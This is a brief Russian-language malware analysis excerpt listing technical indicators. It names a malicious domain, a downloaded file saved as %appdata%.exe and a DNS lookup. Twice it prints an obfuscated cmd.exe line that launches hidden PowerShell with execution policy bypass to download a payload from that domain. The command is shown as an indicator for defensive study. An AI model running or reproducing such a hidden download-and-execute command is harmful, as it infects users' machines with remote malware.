Техническая информация
- http://cometogod.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwer^shElL.Ex^e ^-E^xEc^UTIOnp^OlIcy^ B^ypAss^ ^-^NopRoFILe^ -w^i^N^Dows^tYLE h^idDe^n (^neW-O^Bjec^t^ S^Y^StEm.^Ne^T^.w^e^b^Cli^EN^t^).D^o^wnloAdF^i^Le^('http://cometogod.to...
- DNS ASK co###ogod.top
- '<SYSTEM32>\cmd.exe' /c "pOwer^shElL.Ex^e ^-E^xEc^UTIOnp^OlIcy^ B^ypAss^ ^-^NopRoFILe^ -w^i^N^Dows^tYLE h^idDe^n (^neW-O^Bjec^t^ S^Y^StEm.^Ne^T^.w^e^b^Cli^EN^t^).D^o^wnloAdF^i^Le^('http://cometogod.to...' (со скрытым окном)